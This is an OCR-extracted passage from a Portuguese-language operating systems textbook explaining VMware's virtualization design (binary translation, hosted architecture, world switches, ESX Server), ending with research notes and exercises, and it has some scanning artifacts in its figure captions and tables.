ção de programas aplicativos, que eram responsáveis 
pela maior parte do tempo de execução em cargas de 
trabalho relevantes. A razão é que essas instruções 
sensíveis à virtualização não são sensíveis o tempo 
inteiro; em vez disso, elas são sensíveis apenas em 
determinadas circunstâncias. Por exemplo, a instru- 
ção POPF é sensível à virtualização quando se espera 
que o software seja capaz de desabilitar interrupções 
(por exemplo, quando executando o sistema opera- 
cional), mas não é sensível à virtualização quando 
o software não consegue desabilitar interrupções (na 
prática, quando executando quase todas as aplicações 
ao nível do usuário). 

A Figura 7.8 mostra os blocos de construção mo- 
dulares do VMM VMware original. Vemos que ele 
consiste em um subsistema de execução direta, um 
subsistema de tradução binária e um algoritmo de de- 
cisão para determinar qual subsistema deve ser usado. 
Ambos os subsistemas contam com módulos compar- 
tilhados, por exemplo para virtualizar a memória por 
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(cj: WA:] Componentes de alto nível do monitor de maquina 
virtual VMware (na ausência de suporte do hardware). 
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(MMU de sombra, tratamento de E/S, ...) 





meio de tabelas de páginas sombras, ou para emular 
dispositivos de E/S. 

O subsistema de execução direta é o preferido, e o 
subsistema de tradução binária dinâmica proporciona 
um mecanismo de recuo sempre que a execução direta 
não for possível. Esse é o caso, por exemplo, sempre 
que a máquina virtual está em tal estado que ela poderia 
emitir uma instrução sensível à virtualização. Portanto, 
cada subsistema reavalia constantemente o algoritmo de 
decisão para determinar se uma troca de subsistemas é 
possível (da tradução binária à execução direta) ou ne- 
cessária (da execução direta à tradução binária). Esse 
algoritmo tem um número de parâmetros de entrada, 
como o anel de execução atual da máquina virtual, se 
as interrupções podem ser habilitadas naquele nível, e o 
estado dos segmentos. Por exemplo, a tradução binária 
deve ser usada se qualquer uma das condições a seguir 
for verdadeira: 


1. A máquina virtual está executando atualmente no 
modo núcleo (anel 0 na arquitetura x86). 

2. A máquina virtual pode desabilitar interrupções 
e emitir instruções de E/S (na arquitetura x86, 
quando de privilégio de E/S é estabelecido para o 
nível de anel). 

3. A máquina virtual está executando atualmente no 
modo real, um modo legado de execução de 16 
bits usado pelo BIOS entre outras coisas. 


O algoritmo de decisão real contém algumas condi- 
ções adicionais. Os detalhes podem ser encontrados em 
Bugnion et al. (2012). De maneira interessante, o algo- 
ritmo não depende das instruções que são armazenadas 
na memória e podem ser executadas, mas somente no 
valor de alguns registros virtuais; portanto, ele pode ser 
avaliado de maneira muito eficiente em apenas um pu- 
nhado de instruções. 

O segundo insight fundamental foi de que ao confi- 
gurar de maneira adequada o hardware, particularmente 


usando os mecanismos de proteção de segmento do x86 
cuidadosamente, o código do sistema sob a tradução bi- 
nária dinâmica também poderia executar a velocidades 
quase nativas. Isso é muito diferente da redução de fa- 
tor de cinco normalmente esperada de simuladores de 
máquinas. 

A diferença pode ser explicada comparando como 
um tradutor binário dinâmico converte uma simples 
instrução que acessa a memória. Para emular essa 
instrução no software, um tradutor binário clássi- 
co emulando a arquitetura do conjunto de instruções 
x86 completa teria de primeiro verificar se o endereço 
efetivo está dentro do alcance do segmento de dados, 
então converter o endereço em um endereço físico e 
por fim copiar a palavra referenciada em um registro 
simulado. É claro, esses vários passos podem ser oti- 
mizados com o armazenamento em cache, de uma ma- 
neira muito similar a como o processador armazenou 
em cache mapeamentos da tabela de páginas no trans- 
lation-lookaside buffer. Mas mesmo tais otimizações 
levariam a uma expansão das instruções individuais 
em uma sequência de instruções. 

O tradutor binário VMware não realiza nenhum des- 
ses passos no software. Em vez disso, configura o hard- 
ware de maneira que essa simples instrução possa ser 
emitida novamente com uma instrução idêntica. Isso é 
possível apenas porque o VMM do VMware (do qual o 
tradutor binário é um componente) configurou previa- 
mente o hardware para casar com a especificação exata 
da maquina virtual: (a) o VMM usa tabelas de páginas 
sombras, o que assegura que a unidade de gerenciamen- 
to da memória pode ser usada diretamente (em vez de 
emulada) e (b) o VMM usa uma abordagem de sombre- 
amento similar às tabelas de descritores de segmentos 
(que tiveram um papel importante nos softwares de 16 
bits e 32 bits executando em sistemas operacionais x86 
mais antigos). 

Existem, é claro, complicações e sutilezas. Um as- 
pecto importante do projeto é assegurar a integridade da 
caixa de areia (sandbox) da virtualização, isto é, assegu- 
rar que nenhum software executando dentro da máqui- 
na virtual (incluindo softwares malignos) possa mexer 
com o VMM. Esse problema geralmente é conhecido 
como isolamento de falhas de software e acrescenta 
uma sobrecarga de tempo de execução a cada acesso de 
memória se a solução for implementada em software. 
Aqui, também, o VMM do VMware usa uma aborda- 
gem diferente, baseada em hardware. Ele divide o espa- 
ço de endereço em duas zonas desarticuladas. O VMM 
reserva para o seu próprio uso os 4 MB do topo do es- 
paço de endereçamento. Isso libera o resto (isto é, 4 GB 


— 4 MB, já que estamos falando de uma arquitetura de 
32 bits) para o uso da máquina virtual. O VMM então 
configura o hardware de segmentação de maneira que 
nenhuma instrução da máquina virtual (incluindo aque- 
las geradas pelo tradutor binário) poderá acessar um dia 
a região dos 4 MB do topo do espaço de endereçamento. 


Uma estratégia centrada no sistema operacional 
hóspede 


Idealmente, um VMM deve ser projetado sem se 
preocupar com o sistema operacional hóspede execu- 
tando na máquina virtual, ou como aquele sistema ope- 
racional hóspede configura o hardware. A ideia por trás 
da virtualização é tornar a interface da máquina virtual 
idêntica à interface do hardware, de maneira que todo o 
software que executa no hardware também executará na 
máquina virtual. Infelizmente, essa abordagem é prática 
apenas quando a arquitetura é virtualizável e simples. 
No caso do x86, a complexidade assoberbante da arqui- 
tetura era um problema evidente. 

Os engenheiros do VMware simplificaram o pro- 
blema concentrando-se somente em uma seleção de 
sistemas operacionais hóspedes aceitos. No primeiro 
lançamento, o VMware Workstation aceitou oficial- 
mente somente o Linux, o Windows 3.1, o Windows 
95/98 e o Windows NT como sistemas operacionais 
hóspedes. Com o tempo, novos sistemas operacionais 
foram acrescentados à lista com cada revisão do softwa- 
re. Mesmo assim, a emulação foi tão boa que executou 
perfeitamente alguns sistemas operacionais inespera- 
dos, como o MINIX 3, sem nenhuma modificação. 

Essa simplificação não mudou o projeto como um 
todo — o VMM ainda fornecia uma cópia fiel do hard- 
ware subjacente, mas ajudou a guiar o processo de 
desenvolvimento. Em particular, os engenheiros tinham 
de se preocupar somente com as combinações de ca- 
racterísticas que foram usadas na prática pelos sistemas 
operacionais hóspedes aceitos. 

Por exemplo, a arquitetura x86 contém quatro anéis 
de privilégio em modo protegido (anel O ao anel 3), mas 
na prática nenhum sistema operacional usa o anel 1 ou 
o anel 2 (salvo pelo SO/2, um sistema operacional há 
muito abandonado da IBM). Então em vez de desco- 
brir como virtualizar corretamente o anel 1 e o anel 2, o 
VMM do VMware tinha um código para detectar se um 
hóspede estava tentando entrar no anel 1 ou no anel 2, 
e, nesse caso, abortaria a execução da máquina virtual. 
Isso não apenas removeu o código desnecessário como, 
mais importante, permitiu que o VMM do VMware pre- 
sumisse que aqueles anéis 1 e 2 jamais seriam usados 
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pela máquina virtual e, portanto, que ele poderia usar 
esses anéis para seus próprios fins. Na realidade, o tra- 
dutor binário do VMM do VMware executa no anel 1 
para virtualizar o código do anel 0. 


A plataforma de hardware virtua 


Até o momento, discutimos fundamentalmente o 
problema associado com a virtualização do processa- 
dor x86. Mas um computador baseado no x86 é muito 
mais do que o seu processador. Ele tem um conjunto 
de chips, algum firmware e um conjunto de periféricos 
de E/S para controlar discos, placas de rede, CD-ROM, 
teclado etc. 

A diversidade dos periféricos de E/S nos computa- 
dores pessoais x86 tornou impossível casar o hardware 
virtual com o hardware real subjacente. Enquanto havia 
só um punhado de modelos de processador x86 no mer- 
cado, com apenas variações menores de capacidades 
no nível do conjunto de instruções, havia milhares de 
dispositivos de E/S, a maioria dos quais não tinha uma 
documentação publicamente disponível de sua interface 
ou funcionalidade. O insight fandamental do VMware 
foi não tentar fazer que hardware virtual casasse com o 
hardware subjacente específico, mas em vez disso fazer 
que ele sempre casasse com alguma configuração com- 
posta de dispositivos de E/S canônicos selecionados. 
Sistemas operacionais hóspedes então usavam seus pró- 
prios mecanismos já existentes para detectar e operar 
esses dispositivos (virtuais). 

A plataforma de virtualização consistia em uma 
combinação de componentes emulados e multiplexa- 
dos. Multiplexar significava configurar o hardware para 
que ele pudesse ser usado diretamente pela máquina 
virtual, e compartilhado (no espaço ou no tempo) por 
múltiplas máquinas virtuais. A emulação significava ex- 
portar uma simulação de software de um componente 
de hardware canônico selecionado para a máquina vir- 
tual. A Figura 7.9 mostra que o VMware Workstation 
usava a multiplexação para o processador e a memória, 
e a emulação para todo o resto. 

Para o hardware multiplexado, cada máquina virtual 
tinha a ilusão de ter uma CPU dedicada e uma configu- 
rável, mas fixo montante de RAM contígua começando 
no endereço físico 0. 

Em termos de arquitetura, a emulação de cada dis- 
positivo virtual era dividida entre um componente de 
front end, que era visível para a máquina virtual, e um 
componente de back end, que interagia com o siste- 
ma operacional hospedeiro (WALDSPURGER e RO- 
SENBLUM, 2012). O front end era essencialmente um 
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modelo de software do dispositivo de hardware que 
podia ser controlado por drivers de dispositivos inalte- 
rados executando dentro da máquina virtual. Descon- 
siderando o hardware físico correspondente específico 
no hospedeiro, o front end sempre expunha o mesmo 
modelo de dispositivo. 

Por exemplo, o primeiro front end de dispositivo de 
Ethernet foi o chip AMD PCnet “Lance”, outrora uma 
placa de plug-in de 10 Mbps popular em PCs, e o back 
end provinha a conectividade de rede para a rede física 
do hospedeiro. Ironicamente, o VMware seguia dando 
suporte ao dispositivo PCnet muito tempo depois de as 
placas Lance físicas não estarem mais disponíveis, e 
na realidade alcançou E/S que era ordens de magnitu- 
de mais rápida do que 10 Mbps (SUGERMAN et al., 
2001). Para dispositivos de armazenamento, os front 
ends originais eram um controlador IDE e um Buslogic 
Controller (controlador de lógica de barramento), e o 
back end era tipicamente um arquivo no sistema de ar- 
quivos hospedeiro, como um disco virtual ou uma ima- 
gem ISO 9660, ou um recurso bruto como uma partição 
de disco ou o CD-ROM fisico. 

A divisão dos front ends dos back ends trouxe outro 
benefício: uma máquina virtual VMware podia ser copia- 
da de um computador para outro, possivelmente com di- 
ferentes dispositivos de hardware. No entanto, a máquina 


virtual não teria de instalar drivers dos dispositivos novos 
tendo em vista que ela só interagia com o componente 
front end. Esse atributo, chamado de encapsulamento 
independente de hardware, confere um benefício enor- 
me hoje em dia nos ambientes de servidores e na compu- 
tação na nuvem. Ele capacitou inovações subsequentes 
como suspender/retomar, checkpointing e a migração 
transparente de máquinas virtuais vivas através de fron- 
teiras físicas (NELSON et al., 2005). Na nuvem, ele per- 
mite que os clientes empreguem suas máquinas virtuais 
em qualquer servidor disponível, sem ter de se preocupar 
com os detalhes do hardware subjacente. 


O papel do sistema operacional hospedeiro 


A decisão crítica de projeto final no VMware Work- 
station foi empregá-lo “sobre” um sistema operacional 
existente. Isso o classifica como um hipervisor tipo 2. A 
escolha tinha dois benefícios principais. 

Primeiro, ela resolveria a segunda parte do desafio 
de diversidade periférica. O VMware implementava 
a emulação de front end de vários dispositivos, mas 
contava com os drivers do dispositivo do sistema ope- 
racional hospedeiro para o back end. Por exemplo, o 
VMware Workstation leria ou escreveria um arquivo 
no sistema de arquivos do hospedeiro para emular um 


alles Ã:) Opções de configuração de hardware virtual do VMware Workstation inicial, circa 2000. 





















































Hardware virtual (front end) Back end 
g 1 CPU x86 virtual, com as mesmas extensões do conjunto de Escalonado pelo sistema operacional hospedeiro em um 
x instruções que a CPU do hardware subjacente. computador com um ou múltiplos processadores. 
e 
5 Até 512 MB de DRAM contígua. Alocado e gerenciado pelo SO hospedeiro (página por página) 
Barramento PCI Barramento PCI totalmente emulado. 
4x Discos IDE Discos virtuais (armazenados como arquivos) ou acesso direto 
7x Discos SCSI Buslogic a um determinado dispositivo bruto. 
1x CD-ROM IDE Imagem ISO ou acesso emulado ao CD-ROM real. 
2x unidades de discos flexíveis de 1,44 MB Disco flexível físico ou imagem de disco físico. 
z 1x placa gráfica do VMware com suporte a VGA e SVGA Executava em uma janela e em modo de tela cheia. SVGA 
E exigia um driver VMware SVGA para o hóspede. 
2 2x portas seriais COM1 e COM2 Conecta com a porta serial do hospedeiro ou um arquivo. 
j 1x impressora (LPT) Pode conectar à porta LPT do hospedeiro. 
1x teclado (104-key) Completamente emulado; eventos de códigos de teclas são 
gerados quando eles são recebidos pela aplicação VMware. 
1x mouse PS-2 O mesmo que o teclado. 
3x placas Ethernet Lance AMD Modos ponte (bridge) e somente-hospedeiro (host-only). 
1x Soundblaster Totalmente emulado. 











dispositivo de disco virtual, ou desenharia em uma jane- 
la no computador do hospedeiro para emular uma pla- 
ca de vídeo. Desde que o sistema operacional anfitrião 
tivesse os drivers apropriados, o VMware Workstation 
podia executar máquinas virtuais sobre ele. 

Segundo, o produto podia instalar e se parecer com 
uma aplicação normal para um usuário, tornando a ado- 
ção mais fácil. Como qualquer aplicação, o instalador 
do VMware Workstation simplesmente escreve seus 
arquivos componentes em um sistema de arquivos exis- 
tente do hospedeiro, sem perturbar a configuração do 
hardware (sem a reformatação de um disco, criação de 
uma partição de disco ou modificação das configura- 
ções da BIOS). Na realidade, o VMware Workstation 
podia ser instalado e começar a executar máquinas vir- 
tuais sem exigir nem a reinicialização do sistema opera- 
cional, pelo menos nos hospedeiros Linux. 

No entanto, uma aplicação normal não tem os gan- 
chos e APIs necessários para um hipervisor multiplexar 
a CPU e recursos de memória, o que é essencial para 
prover um desempenho quase nativo. Em particular, a 
tecnologia de virtualização x86 central descrita funcio- 
na somente quando o VMM executa no modo núcleo e 
pode, além disso, controlar todos os aspectos do proces- 
sador sem quaisquer restrições. Isso inclui a capacidade 
de mudar o espaço de endereçamento (para criar tabelas 
de páginas sombras), mudar as tabelas de segmentos e 
mudar todos os tratadores de interrupções e exceções. 

Um driver de dispositivo tem mais acesso direto ao 
hardware, em particular se ele executa em modo núcleo. 
Embora ele pudesse (na teoria) emitir quaisquer instru- 
ções privilegiadas, na prática é esperado que um driver 
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de dispositivo interaja com seu sistema operacional 
usando APIs bem definidas, e não deveria (jamais) re- 
configurar arbitrariamente o hardware. E tendo em vista 
que os hipervisores pedem uma reconfiguração extensa 
do hardware (incluindo todo o espaço de endereçamen- 
to, tabelas de segmentos, tratadores de exceções e in- 
terrupções), executar o hipervisor como um driver de 
dispositivo também não era uma opção realista. 

Dado que nenhuma dessas suposições tem o suporte 
dos sistemas operacionais hospedeiros, executar o hi- 
pervisor como um driver de dispositivo (no modo nú- 
cleo) também não era uma opção. 

Essas exigências rigorosas levaram ao desenvolvi- 
mento da VMware Hosted Architecture (arquitetura 
hospedada). Nela, como mostrado na Figura 7.10, o 
software é dividido em três componentes distintos e 
separados. 

Cada um desses componentes tem funções diferen- 
tes e opera independentemente do outro: 


1. Um programa do espaço do usuário (o VMX) que 
ele percebe como o programa VMware. O VMX 
desempenha todas as funções de UI, inicializa 
a máquina virtual e então desempenha a maior 
parte da emulação de dispositivos (front end) e 
faz chamadas de sistema regulares para o siste- 
ma operacional hospedeiro para as interações 
do back end. Em geral há um processo VMX de 
múltiplos threads por máquina virtual. 

2. Um pequeno driver de dispositivo de modo nú- 
cleo (o driver VMX), que é instalado dentro do 
sistema operacional hospedeiro. Ele é usado pri- 
mariamente para permitir que o VMM execute 


[elo TIA o] A VMware Hosted Architecture e seus três componentes: VMX, driver VMM e VMM. 
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suspendendo temporariamente todo o sistema 
operacional hospedeiro. Existe um driver de 
VMX instalado no sistema operacional hospedei- 
ro, tipicamente no momento da inicialização. 

3. O VMM, que inclui todo o software necessário 
para multiplexar a CPU e a memória, incluindo 
os tratadores de exceções, os tratadores de cap- 
tura e emulação, o tradutor binário e o módulo 
de paginação sombra. O VMM executa no modo 
núcleo, mas não no contexto do sistema opera- 
cional hospedeiro. Em outras palavras, ele não 
pode contar diretamente com os serviços ofere- 
cidos pelo sistema operacional hospedeiro, mas 
também não fica restrito por quaisquer regras ou 
convenções impostas por esse sistema. Há uma 
instância VMM para cada máquina virtual, criada 
quando a máquina virtual inicializa. 


O VMware Workstation parece executar sobre um 
sistema operacional existente e, na realidade, o seu 
VMX executa como um processo daquele sistema 
operacional. No entanto, o VMM opera no nível de 
sistema, com controle absoluto do hardware, e sem 
depender de maneira alguma do sistema operacional 
hospedeiro. A Figura 7.10 mostra a relação entre as 
entidades: os dois contextos (sistema operacional hos- 
pedeiro e VMM) são pares um do outro, e cada um tem 
um componente de nível de usuário e de núcleo. Quan- 
do o VMM executa (a metade direita da figura), ele 
reconfigura o hardware, lida com todas as interrupções 
e exceções de E/S, e pode, portanto, remover tempo- 
rariamente de maneira segura o sistema operacional 
hospedeiro de sua memória virtual. Por exemplo, a 
localização da tabela de interrupções é configurada 
dentro do VMM ao alocar o registrador IDTR para um 
novo endereço. De maneira inversa, quando o sistema 
operacional executa (a metade esquerda da figura), o 


VMM e sua máquina virtual são igualmente removi- 
dos de sua memória virtual. 

A transição entre esses dois contextos totalmente 
independentes ao nível do sistema é chamada de uma 
troca de mundo (world switch). O nome em si enfatiza 
que tudo a respeito do software muda durante uma tro- 
ca de mundo, em comparação com a troca de contexto 
regular implementada por um sistema operacional. A 
Figura 7.11 mostra a diferença entre as duas. A troca 
de contexto regular entre os processos “A” e “B” troca 
a porção do usuário do espaço de endereçamento e os 
registradores dos dois processos, mas deixa inalterada 
uma série de recursos críticos do sistema. Por exem- 
plo, a porção do núcleo do espaço de endereçamento 
é idêntica para todos os processos, e os tratadores de 
exceção também não são modificados. Em comparação, 
a troca de mundo muda tudo: todo o espaço de endere- 
çamento, todos os tratadores de exceções, registradores 
privilegiados etc. Em particular, o espaço de endereça- 
mento do núcleo do sistema operacional hospedeiro é 
mapeado só quando executando no contexto de sistema 
operacional hospedeiro. Após a troca de mundo para o 
contexto VMM, ele foi removido completamente do es- 
paço de endereçamento, liberando espaço para executar 
ambos: o VMM e a máquina virtual. Embora soe com- 
plicado, isso pode ser implementado de maneira bastan- 
te eficiente e leva apenas 45 instruções de linguagem de 
máquina x86 para executar. 

O leitor cuidadoso terá se perguntado: e o espaço de 
endereçamento do núcleo do sistema operacional hós- 
pede? A resposta é simplesmente que ele faz parte do 
espaço de endereçamento da máquina virtual e está pre- 
sente quando executa no contexto do VMM. Portanto, 
o sistema operacional hóspede pode usar o espaço de 
endereçamento inteiro e, em particular, as mesmas loca- 
lizações na memória virtual que o sistema operacional 
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hospedeiro. Isso é bem o que acontece quando os sis- 
temas operacionais hóspede e hospedeiro são os mes- 
mos (por exemplo, ambos são Linux). É claro, isso tudo 
“apenas funciona” por causa dos dois contextos inde- 
pendentes e da troca de mundo entre os dois. 

O mesmo leitor se perguntará então: e a área do 
VMM, bem no topo do espaço de endereçamento? 
Como já discutimos, ela é reservada para o próprio 
VMM, e aquelas porções do espaço do endereçamento 
não podem ser usadas diretamente pela máquina virtual. 
Felizmente, aquela pequena porção de 4 MB não é usa- 
da com frequência pelos sistemas operacionais hóspe- 
des já que cada acesso aquela porção da memória deve 
ser emulado individualmente e induz uma sobrecarga 
considerável de software. 

Voltando à Figura 7.10: ela ilustra de maneira mais 
clara ainda os vários passos que ocorrem quando uma 
interrupção de disco acontece enquanto o VMM está 
executando (passo 1). É claro, o VMM não pode lidar 
com a interrupção visto que ele não tem o driver de dis- 
positivo do back end. Em (ii), o VMM realiza uma troca 
de mundo de volta para o sistema operacional hospedei- 
ro. Especificamente, o código de troca de mundo retor- 
na o controle ao driver do VMware, que em (iii) emula 
a mesma interrupção que foi emitida pelo disco. Então, 
no passo (iv), o tratador de interrupção do sistema ope- 
racional hospedeiro executa usando sua lógica, como se 
a interrupção de disco tivesse ocorrido enquanto o dri- 
ver do VMware (mas não o VMM!) estava executando. 
Por fim, no passo (v), o driver do VMware retorna o 
controle para a aplicação VMX. Nesse ponto, o sistema 
operacional hospedeiro pode escolher escalonar outro 
processo, ou seguir executando o processo VMX do 
VMware. Se o processo VMX seguir executando, ele 
vai então retomar a execução da máquina virtual reali- 
zando uma chamada especial para o driver do disposi- 
tivo, o que gerará uma troca de mundo de volta para o 
contexto VMM. Como você pode ver, esse é um truque 
esperto que esconde todo o VMM e a máquina virtual 
do sistema operacional hospedeiro. E o mais importan- 
te, ele proporciona ao VMM liberdade absoluta para re- 
programar o hardware como ele achar melhor. 


7.12.5 A evolução do VMware Workstation 


O panorama tecnológico mudou dramaticamente na 
década posterior ao desenvolvimento do Monitor de 
Máquina Virtual VMware. 

A arquitetura hospedada é ainda hoje usada para hi- 
pervisores sofisticados como o VMware Workstation, 
VMware Player e VMware Fusion (o produto voltado 
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para sistemas operacionais hospedeiros Apple OS X), 
e mesmo nos produtos VMware voltados para os tele- 
fones celulares (BARR et al., 2010). A troca de mundo 
e sua capacidade de separar o contexto do sistema ope- 
racional hospedeiro do contexto do VMM seguem o 
mecanismo fundacional dos produtos hospedados do 
VMware hoje. Embora a implementação da troca de 
mundo tenha evoluído através dos anos, por exemplo, 
para dar suporte a sistemas de 64 bits, a ideia fundamen- 
tal de ter espaços de endereçamento totalmente separa- 
dos para o sistema operacional hospedeiro e o VMM 
permanece válida. 

Em comparação, a abordagem para a virtualização da 
arquitetura x86 mudou de maneira bastante radical com 
a introdução da virtualização assistida por hardware. 
As virtualizações assistidas por hardware, como a In- 
tel VT-x e AMD-v foram introduzidas em duas fases. 
A primeira fase, começando em 2005, foi projetada 
com a finalidade explícita de eliminar a necessidade 
tanto da paravirtualização quanto da tradução binária 
(UHLIG et al., 2005). Começando em 2007, a segunda 
fase forneceu suporte de hardware na MMU na for- 
ma de tabelas de páginas aninhadas. Isso eliminava a 
necessidade de manter tabelas de páginas sombra no 
software. Hoje, os hipervisores VMware em sua maior 
parte adotam uma abordagem captura e emulação ba- 
seada em hardware (como formalizada por Popek e 
Goldberg quatro décadas antes) sempre que o proces- 
sador der suporte tanto à virtualização quanto às tabe- 
las de páginas aninhadas. 

A emergência do suporte de hardware para a virtua- 
lização teve um impacto significativo sobre a estratégia 
centrada no sistema operacional hóspede do VMware. No 
VMware Workstation original, a estratégia era usada para 
reduzir drasticamente a complexidade de implementação 
à custa da compatibilidade com a arquitetura completa. 
Hoje, a compatibilidade com a arquitetura completa é es- 
perada por causa do suporte do hardware. A estratégia 
centrada no sistema operacional hóspede do VMware 
atual concentra-se nas otimizações de desempenho para 
sistemas operacionais hóspedes selecionados. 


7.12.6 ESX Server: o hipervisor tipo 1 do VMware 


Em 2001, o VMware lançou um produto diferente, 
chamado ESX Server, voltado para o mercado de servi- 
dores. Aqui, os engenheiros do VMware adotaram uma 
abordagem diferente: em vez de criar uma solução do 
tipo 2 executando sobre um sistema operacional hospe- 
deiro, eles decidiram construir uma solução tipo 1 que 
executaria diretamente no hardware. 
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A Figura 7.12 mostra a arquitetura de alto nivel do 
ESX Server. Ela combina um componente existente, o 
VMM, com um hipervisor real executando diretamente 
sobre o hardware. O VMM desempenha a mesma função 
que no VMware Workstation, que é executar a máquina 
virtual em um ambiente isolado que é uma duplicata da 
arquitetura x86. Na realidade, os VMMs usados nos dois 
produtos usavam a mesma base de código-fonte, e eles 
eram em grande parte idênticos. O hipervisor ESX subs- 
titui o sistema operacional hospedeiro. Mas em vez de 
implementar a funcionalidade absoluta esperada de um 
sistema operacional, a sua única meta é executar as vá- 
rias instâncias de VMM e gerenciar de maneira eficiente 
os recursos físicos da máquina. O ESX Server, portanto, 
contém os subsistemas usuais encontrados em um siste- 
ma operacional, como um escalonador de CPU, um ge- 
renciador de memória e um subsistema de E/S, com cada 
subsistema otimizado para executar máquinas virtuais. 

A ausência de um sistema operacional anfitrião exi- 
giu que o VMware abordasse diretamente as questões 
da diversidade de periféricos e experiência do usuário 
descritas anteriormente. Para a diversidade de periféri- 
cos, o VMware restringiu o ESX Server para executar 
somente em plataformas de servidores bem conhecidas 
e certificadas, para as quais ele tinha drivers de dispo- 
sitivos. Quanto à experiência do usuário, o ESX Server 
(diferentemente do VMware Workstation) exigia que os 
usuários instalassem uma nova imagem de sistema em 
uma partição de inicialização. 

Apesar dos problemas, a troca fez sentido para dispo- 
sições dedicadas da virtualização em centros de proces- 
samento de dados, consistindo em centenas ou milhares 
de servidores físicos, e muitas vezes (muitos) milhares 
de máquinas virtuais. Tais disposições são às vezes re- 
feridas hoje como nuvens privadas. Ali, a arquitetura 
do ESX Server proporciona benefícios substanciais em 
termos de desempenho, escalabilidade, capacidade de 
gerenciamento e características. Por exemplo: 


1. O escalonador da CPU assegura que cada maqui- 
na virtual receba uma porção justa da CPU (para 
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evitar a inanição). Ele também é projetado de ma- 
neira que diferentes CPUs virtuais de uma dada 
maquina virtual multiprocessada sejam escalona- 
das ao mesmo tempo. 

2. O gerenciador de memoria é otimizado para esca- 
labilidade, em particular para executar as maquinas 
virtuais de maneira eficiente quando elas precisam 
de mais memoria do que ha realmente disponivel 
no computador. Para conseguir esse resultado, 
o ESX Server primeiro introduziu a noção de ballo- 
oning e compartilhamento transparente de páginas 
para máquinas virtuais (WALDSPURGER, 2002). 

3. O subsistema de E/S é otimizado para desempenho. 
Embora o VMware Workstation e o ESX Server 
compartilhem muitas vezes os mesmos compo- 
nentes de emulação de front end, os back ends 
são totalmente diferentes. No caso do VMware 
Workstation, toda E/S flui através do sistema ope- 
racional hospedeiro e sua API, o que muitas ve- 
zes gera mais sobrecarga. Isso é particularmente 
verdadeiro no caso dos dispositivos de rede e de 
armazenamento. Com o ESX Server, esses drivers 
de dispositivos executam diretamente dentro do 
hipervisor ESX, sem exigir uma troca de mundo. 

4. Os back ends também contavam tipicamente com 
abstrações fornecidas pelo sistema operacional 
hospedeiro. Por exemplo, o VMware Workstation 
armazena imagens de máquinas virtuais como 
arquivos regulares (mas muito grandes) no siste- 
ma de arquivos do hospedeiro. Em comparação, 
o ESX Server tem o VMFS (VAGHANI, 2010), 
um sistema de arquivos otimizado especificamen- 
te para armazenar imagens de máquinas virtuais e 
assegurar uma alta produção de E/S. Isso permite 
níveis extremos de desempenho. Por exemplo, a 
VMware demonstrou lá em 2011 que um único 
ESX Server podia emitir 1 milhão de operações de 
disco por segundo (VMWARE, 2011). 

5. O ESX Server tornou mais fácil introduzir novas 
capacidades, o que exigia a coordenação estreita 
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e a configuração específica de múltiplos compo- 
nentes de um computador. Por exemplo, o ESX 
Server introduziu o VMotion, a primeira solução 
de virtualização que poderia migrar uma máquina 
virtual viva de uma máquina executando ESX Ser- 
ver para outra máquina executando ESX Server, 
enquanto ela estava executando. Essa conquista 
exigiu a coordenação do gerenciador de memória, 
do escalonador de CPU e da pilha de rede. 


Ao longo dos anos, novas características foram 
acrescentadas ao ESX Server. O ESX Server evoluiu 
para o ESXi, uma alternativa menor que é pequena o 
bastante em tamanho para ser pré-instalada no firmware 
de servidores. Hoje, ESXi é o produto mais importante 
da VMware e serve como base da suíte vSphere. 


7.13 Pesquisas sobre a virtualização e a 
nuvem 


A tecnologia de virtualização e a computação na nu- 
vem são ambas áreas extremamente ativas de pesquisa. 
As pesquisas produzidas nesses campos são tantas que 
é difícil enumerá-las. Cada uma tem múltiplas confe- 
rências de pesquisa. Por exemplo, a conferência Virtual 
Execution Environments (VEE) concentra-se na virtua- 
lização no sentido mais amplo. Você encontrará estudos 
sobre deduplicação de migração, escalabilidade e assim 
por diante. Da mesma maneira, o ACM Symposium on 
Cloud Computing (SOCC) é um dos melhores foros so- 
bre computação na nuvem. Artigos no SOCC incluem 
trabalhos sobre resistência a falhas, escalonamento de 
cargas de trabalho em centros de processamento de da- 
dos, gerenciamento e debugging nas nuvens, e assim 
por diante. 


PROBLEMAS 


1. Dê uma razão por que um centro de processamento de 
dados possa estar interessado em virtualização. 

2. Dê uma razão por que uma empresa poderia estar inte- 
ressada em executar um hipervisor em uma máquina que 
ja é usada há um tempo. 

3. Dé uma razão por que um desenvolvedor de softwares 
possa usar a virtualização em uma máquina de mesa sen- 
do usada para desenvolvimento. 
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Velhos tópicos realmente nunca morrem, como em 
Penneman et al. (2013), que examinam os problemas de 
virtualizar o ARM pelo enfoque dos critérios de Popek 
e Goldberg. A segurança é perpetuamente um tópico em 
alta (BEHAM et al., 2013; MAO, 2013; e PEARCE et 
al., 2013), assim como a redução do uso de energia (BO- 
TERO e HESSELBACH, 2013; e YUAN et al., 2013). 
Com tantos centros de processamento de dados usando 
hoje a tecnologia de virtualização, as redes conectando 
essas máquinas também são um tópico importante de 
pesquisa (THEODOROU et al., 2013). A virtualização 
em redes sem fio também é um assunto que vem se afir- 
mando (WANG et al., 2013a). 

Uma área empolgante que viu muitas pesquisas inte- 
ressantes é a virtualização aninhada (BEN-YEHUDA et 
al., 2010; ZHANG et al., 2011). A ideia é que uma má- 
quina virtual em si pode ser virtualizada mais ainda em 
múltiplas máquinas virtuais de nível mais elevado, que 
por sua vez podem ser virtualizadas e assim por diante. 
Um desses projetos é apropriadamente chamado “Tur- 
tles” (Tartarugas), pois uma vez que você começa, “It 5 
turtles all the way down!” 

Uma das coisas boas a respeito do hardware de virtu- 
alização é que um código não confiável pode conseguir 
acesso direto mas seguro a aspectos do hardware como 
tabelas de páginas e TLBs marcadas (tagged TLBs). 
Com isso em mente, o projeto Dune (BELAY, 2012) não 
busca proporcionar uma abstração de máquina, mas em 
vez disso ele proporciona uma abstração de processo. 
O processo é capaz de entrar no modo Dune, uma tran- 
sição irreversível que lhe dá acesso ao hardware de bai- 
xo nível. Mesmo assim, ainda é um processo e capaz de 
dialogar e contar com o núcleo. A única diferença é que 
ele usa a instrução VMCALL para fazer uma chamada 
de sistema. 


4. Dê uma razão por que um indivíduo em casa poderia 
estar interessado em virtualização. 

5. Por que você acha que a virtualização levou tanto tempo 
para tornar-se popular? Afinal, o estudo fundamental foi 
escrito em 1974 e os computadores de grande porte da 
IBM tinham o hardware e o software necessários nos 
anos de 1970 e além. 


1 Metáfora com sentido semelhante à metáfora do “ovo e da galinha”. Aparece no livro “Uma breve história do tempo” de Stephen Haw- 


king. Sua origem é incerta. (N. T.) 
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10. 


11. 


12. 


13. 


14. 


15. 


16. 


